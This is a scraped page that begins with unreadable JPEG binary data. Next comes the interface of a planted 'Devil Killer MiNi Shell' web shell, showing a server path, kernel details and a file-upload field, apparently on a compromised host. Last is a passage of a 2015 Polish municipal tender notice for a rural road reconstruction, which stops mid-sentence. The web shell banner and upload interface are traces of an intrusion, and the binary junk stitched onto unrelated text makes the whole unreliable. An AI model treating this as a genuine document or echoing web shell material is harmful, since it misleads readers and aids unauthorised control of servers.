JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150615/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150615/87149-N-2015.html

<p class="kh_header"><b>Gręboszów: Przebudowa drogi dojazdowej do gruntów rolnych miejscowości Wola Gręboszowska</b><br>
<b>Numer ogłoszenia: 87149 - 2015; data zamieszczenia: 15.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Gręboszów , Gręboszów 144, 33-260 Gręboszów, woj. małopolskie, tel. 014 6416002, faks (014) 641 60 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.greboszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi dojazdowej do gruntów rolnych miejscowości Wola Gręboszowska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest : Przebudowa drogi dojazdowej do gruntów rolnych miejscowości Wola Gręboszowska.
2.	Zakres przedmiotu zamówienia obejmuje modernizację drogi dojazdowej do gruntów rolnych zlokalizowanej na działkach nr 569/2, 569/1 w miejscowości Wola Gręboszowska. 
3.	Krótka charakterystyka zamówienia:
         1) Roboty pomiarowe i geodezyjne; wytyczenie trasy drogi w terenie z odtworzeniem geodezyjnym granic działki drogi
             w terenie; długość odcinka drogi =0,8 km, szerokość drogi 3,30 m.
         2) Podbudowa;  roboty ziemne  związane z korytowaniem drogi głębokości 20 cm - 2640 m2, wywiezieniem urobku -
              396 m2, wykonanie stabilizacji podłoża cementem przy użyciu zespołu do stabilizacji - pospółka do Rm=2,5 MPa,
              grubość warstwy po zagęszczeniu 30 cm i doziarnienie do projektowanej grubości 35 cm pospółką - 2640 m2.
        3)  Nawierzchnia; z kruszyw łamanych grubości  20 cm stabilizowanych mechanicznie frakcji 0/63 mm wraz 
              z miałowaniem w ilości 28,6 km/m2 - 2560 m2.
        4)  Odwodnienie korpusu drogi poprzez wykonanie drenażu z rur drenarskich o śr. 10 cm z PCV z obsypką żwirem 
             sortowanym i wzmocnione geowłókniną o długości łącznej 159,6 m. Wloty i wyloty sączków drenażu ubezpieczone
             płytami ażurowymi.
        5)  Przebudowa przepustów z rur żelbetowych śr. 800 mm o długości łącznej 18 m z wykonaniem ścian czołowych
              żelbetowych wylewanych na mokro w deskowaniu - 6,210 m3.
        6)  Pobocza ziemne (nasypy) z gruntu rodzimego przy krawędziach jezdni wraz z ich formowaniem i zagęszczaniem
               ubijakami mechanicznymi - 160 m3, ręczne plantowanie - 800 m2.
         Uwaga: Przy realizacji zamówienia wyklucza się zastosowanie kruszyw wapiennych.

  4.   W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany jest:
        1)   udzielić Zamawiającemu   na wykonany przedmiot umowy co najmniej  60 miesięcy gwarancji  i odpowiedzialności 
              z tytułu rękojmi  za  jakość wykonania  przedmiotu  zamówienia.
        2)  przeprowadzić  przeglądy gwarancyjne;  przegląd   pierwszy  Wykonawca przeprowadzi po 12 miesiącach  gwarancji, 
             a  ostatni  w ostatnim   deklarowanym  miesiącu  gwarancji.  Przeglądy gwarancyjne prowadzone będą w obecności  
             przedstawiciela  Wykonawcy,  i przedstawiciela Zamawiającego.  Stwierdzone wady  Wykonawca usunie na własny 
             koszt  w terminach  wskazanych  w protokołach  z wykonania przeglądu.
       Uwaga: Okres gwarancji jakości i odpowiedzialności z tytułu rękojmi za jakość wykonania przedmiotu zamówienia
       stanowi kryterium oceny ofert z wagą 5 %.  Szczegółowy  opis  oceny ofert  w tym kryterium zawarty jest w rozdz. 
       XVI  niniejszej SIWZ. 

 5. Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa i specyfikacje techniczne wykonania
       i odbioru robót budowlanych (STWiORB), zawarte w  załączniku nr 11  do  niniejszej SIWZ, która jest dostępna
       w wersji elektronicznej na stronie internetowej Zamawiającego. 
 6.   Zestawienie robót planowanych do wykonania w ramach w/w zamówienia określa przedmiar robót  znajdujący się 
       w załączniku nr 11  do SIWZ , stanowiący materiał pomocniczy i informacyjny do sporządzenia wyceny.  
 7.   W związku z faktem, iż cena ofertowa ma charakter  ryczałtowy, przed złożeniem oferty, zaleca się Wykonawcy  
       dokonać wizji lokalnej terenu budowy celem pozyskania ewentualnie  informacji, które mogą pomocne do przygotowania
       oferty i uwzględnienia wszystkich ewentualnych robót w cenie oferty.  Koszty dokonania wizji lokalnej terenu  budowy
       ponosi  Wykonawca.
 8.   W przypadku gdy dany opis pozycji przedmiaru nie uwzględnia np. pewnych faz operacyjnych , o których  mowa 
       w projekcie budowlanym, to ich koszty powinny być uwzględnione przez wykonawcę w cenach dotyczących innych
       pozycji. 
    9.   Zamawiający zastrzega, że wszystkie ewentualnie podane w SIWZ opisy nazw własnych  materiałów  (wyrobów) , 
       wyposażenia w sprzęt nie mają na celu naruszenia art.29 i 7 ustawy Pzp, a mają jedynie za zadanie  sprecyzowanie 
       oczekiwań jakościowych i technologicznych Zamawiającego.  Należy rozumieć to jako  określenie wymaganych  
       minimalnych parametrów  użytkowych, funkcjonalnych i technicznych   lub standardów  jakościowych.  Oznacza  to,   
       że zgodnie  z art. 29 ustawy , na wskazane z nazwy materiały  (wyroby)  i wyposażenie w  sprzęt Zamawiający  
      dopuszcza   zastosowanie  równoważnych  materiałów  i wyrobów o nie gorszych parametrach użytkowych, 
      funkcjonalnych i technicznych  niż   opisane w  załączniku do niniejszej SIWZ. Ciężar udowodnienia,  że materiał  
      (wyrób)  jest  równoważny w stosunku do  wymogu  określonego przez  Zamawiającego spoczywa na  składającym  
      ofertę.  W takim przypadku  Wykonawca musi   przedłożyć odpowiednie dokumenty opisujące   parametry techniczne, 
      wymagane prawem  certyfikaty i inne  dokumenty dopuszczające dane materiały  (wyroby) do  użytkowania, oraz 
      pozwalające   jednoznacznie  stwierdzić, że są one  rzeczywiście równoważne.
  10.  Do realizacji przedmiotu zamówienia Wykonawca zobowiązany jest stosować materiały i urządzenia posiadające 
      obowiązujące świadectwa dopuszczenia do stosowania w budownictwie: atesty, certyfikaty, deklaracje zgodności
      z polskimi normami.  Jakość materiałów powinna odpowiadać wymogom wyrobów  dopuszczonych do obrotu
      i stosowania w budownictwie (art.10 Prawa Budowlanego).
 11.   Transport materiałów na plac budowy oraz dostarczenie i eksploatacja maszyn i urządzeń obciążają Wykonawcę.
 12.   Wszelkie roboty winny być prowadzone zgodnie ze sztuką budowlaną, przepisami prawa budowlanego, 
      obowiązującymi  polskimi normami oraz normami europejskimi o ile obowiązują w Polsce, przy zachowaniu 
      przepisów BHP, przy maksymalnym ograniczeniu uciążliwości prowadzonych robót.

13.  Do obowiązków Wykonawcy należeć będzie również:
     1)  organizowanie i zagospodarowanie terenu budowy,
     2)  oznakowanie miejsca  prowadzonych  robót i zabezpieczenia terenu na czas robót przed wstępem osób nie powołanych,
     3)  zagospodarowanie odpadów zgodnie z Ustawą o odpadach z dnia 14.12.2014 (Dz.U. z 2013, 21 ze zm.)
     4) zabezpieczenie pomieszczeń socjalnych dla personelu Wykonawcy i podwykonawców,
     5) wykonanie niezbędnych  prób, badań, odbiorów,
     6) zapewnienie ochrony terenu budowy oraz znajdującego się na nim  mienia oraz warunków bezpieczeństwa,
     7) poniesienie kosztów odtworzenia uszkodzonych dróg, chodników,  zieleni, gruntów ornych, koszty zużycia wody, 
         gazu, energii elektrycznej na placu  budowy,    
     8) ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej
         z przedmiotem zamówienia na kwotę nie mniejszą niż 0,2 mln zł. Kopię aktualnej polisy ubezpieczeniowej lub inny 
         dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej zostanie przez 
         wybranego Wykonawcę przedłożona (y) zostanie przed podpisaniem umowy.
     9)  i inne obowiązki wymienione w  projekcie umowy stanowiący załącznik  nr 7 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje możliwość udzielenia 
          zamówień uzupełniających do wysokości 50 % wartości zamówienia podstawowego (art.67 ust.1 pkt 6 ustawy Pzp)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.    Zamawiający żąda od Wykonawców  wniesienie wadium  przetargowego w kwocie  3.000,00 zł,  słownie: trzy tysiące  
           złotych, które winno być wniesione  przed upływem terminu składania ofert.
    2.    Wadium może być wniesione w jednej  lub w kilku  następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 9 listopada 2000 r. 
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158 ze zm.).
    3  Wadium wnoszone w pieniądzu należy wpłacić  przelewem na rachunek  bankowy Zamawiającego: Konto 
           Nr  33 9462 1013 2004 4000 1498 0006  Bank Spółdzielczy w Dąbrowie Tarnowskiej, Oddział Gręboszów 
           z dopiskiem Wadium do przetargu - Przebudowa drogi rolniczej w m. Wola Gręboszowska.  
    4.    W przypadku wnoszenia wadium w formie pieniężnej do oferty należy załączyć kopię przelewu wadium 
           na  rachunek bankowy Zamawiającego potwierdzoną za zgodność z oryginałem przez Wykonawcę. 
    5.  W przypadku wnoszenia przez Wykonawcę wadium w formie określonej w ust.2 pkt 2-5 zobowiązany  jest on 
           dostarczyć Zamawiającemu oryginał właściwego dokumentu poręczenia lub gwarancji przed upływem  terminu 
           składania ofert i złożyć go w siedzibie Zamawiającego w pokoju nr 11 - sekretariat,  a do  oferty  dołączyć kopię 
           przedmiotowego dokumentu potwierdzoną za zgodność z oryginałem przez Wykonawcę. 
           Wymagana ważność wadium w formach innych niż pieniężna  minimum - 30 dni od daty składania ofert.  Składane 
           przez Wykonawcę wadium w formie niepieniężnej  musi się powoływać w swej treści na przepis   art. 46 ust. 5 ustawy 
           Pzp i być bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne żądanie Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełniania tego warunku. Wykonawca potwierdza 
        spełnianie warunku poprzez złożenie oświadczenia  (wzór oświadczenia - załącznik nr  2 do SIWZ). Ocena  spełnienia 
        tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez Wykonawcę,  na  zasadzie  spełnia /nie 
        spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że zrealizował (zakończył)  co najmniej  dwie roboty budowlane polegające na:  budowie, 
        remoncie, przebudowie lub odbudowie drogi klasy technicznej mn. D , każda o wartości nie mniejszej niż 150 tys. zł,
        i które zostały wykonane   w okresie  ostatnich 5 lat przed  upływem terminu  składania   ofert,  a jeżeli okres prowadzenia
        działalności   jest   krótszy  -   w tym  okresie,  z podaniem  ich rodzaju  i wartości, daty  i miejsca wykonania oraz    
        załączeniem dowodów   dotyczących,  czy roboty te zostały wykonane   w sposób  należyty  oraz  wskazujących, czy 
        zostały   wykonane   zgodnie z zasadami sztuki budowlanej  i prawidłowo   ukończone.  
        Dowodami są poświadczenia lub inne  dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym  charakterze 
        wykonawca nie jest w stanie uzyskać  poświadczenia (wzór wykazu robót  - załącznik nr  4  do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełniania tego warunku. Wykonawca potwierdza 
         spełnianie warunku poprzez złożenie oświadczenia  (wzór oświadczenia - załącznik nr  2 do SIWZ). Ocena spełnienia
         tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez Wykonawcę,  na  zasadzie  spełnia /nie
         spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje  lub dysponować będzie do realizacji zamówienia osobą, która będzie 
         pełnić funkcję kierownika budowy,   posiadającą  uprawnienia budowlane    do pełnienia  samodzielnych funkcji 
        w budownictwie w specjalności drogowej upoważniającej do kierowania robotami drogowymi, wpisaną do właściwej
        izby samorządu  zawodowego oraz  posiadającą aktualne ubezpieczenie od odpowiedzialności cywilnej.    
         Zamawiający,    określając wymogi dla  osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające
         im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające
         im uprawnienia wydane obywatelom państw Europejskiego Obszaru  Gospodarczego oraz Konfederacji Szwajcarskiej, 
         z zastrzeżeniem art. 12 a oraz innych przepisów ustawy  Prawo budowlane (tekst   jednolity. Dz.U. z 2006 r. nr 156, poz.
        1118 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii
         Europejskiej (Dz.U. z 2008 r.  nr 63, poz. 394). Wykonawca potwierdza  spełnianie warunku poprzez złożenie wykazu
         osób, które będą uczestniczyć w wykonaniu zamówienia. (wzór  - załącznik nr  5 do SIWZ) i złożenie oświadczenia, że
         osoby, które będą uczestniczyć  w wykonywaniu zamówienia posiadają wymagane uprawnienia (wzór - załącznik nr 6 
         do SIWZ). Ocena  spełnienia tego warunku zostanie dokonana na podstawie  dokumentów złożonych przez  Wykonawcę,  
         na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia  w tym zakresie szczególnych wymagań,  w zakresie spełniania tego warunku. 
         Wykonawca potwierdza  spełnianie warunku poprzez złożenie oświadczenia  (wzór oświadczenia - załącznik nr  2 
         do SIWZ). Ocena  spełnienia tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez Wykonawcę,  
         na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca musi wykazać, że zrealizował (zakończył)  co najmniej  dwie roboty budowlane polegające na:  budowie, 
        remoncie, przebudowie lub odbudowie drogi klasy technicznej mn. D , każda o wartości nie mniejszej niż 150 tys. zł,
        i które zostały wykonane   w okresie  ostatnich 5 lat przed  upływem terminu  składania   ofert,  a jeżeli okres prowadzenia
        działalności   jest   krótszy  -   w tym  okresie,  z podaniem  ich rodzaju  i wartości, daty  i miejsca wykonania oraz    
        załączeniem dowodów   dotyczących,  czy roboty te zostały wykonane   w sposób  należyty  oraz  wskazujących, czy 
        zostały   wykonane   zgodnie z zasadami sztuki budowlanej  i prawidłowo   ukończone.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Formularz ofertowy (wzór -  załącznik nr 1 do SIWZ).
         2)   Kosztorys ofertowy uproszczony (opis  sporządzenia i złożenia Zamawiającemu w rozdziale  X SIWZ). 
    3)  Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania 
         w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku  gdy umocowanie takie nie wynika
         ze złożonego odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.
       4)  Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz w sposób określony 
            w rozdziale VIII pkt 5.         Uwaga:  Zamawiający informuje, że brak  kosztorysu  ofertowego w ofercie nie może być uzupełniony przez  Wezwanie 
   Wykonawcy do jego do uzupełnienia.  Jego  brak  będzie podstawą odrzucenia oferty zgodnie z art. 89 ust.1 Ustawy
   Pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95.00</li>
<li>2 - Gwarancja - 05.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zmiana   treści   niniejszej   umowy   może nastąpić  wyłącznie w granicach unormowania art.144 ust.1 ustawy 
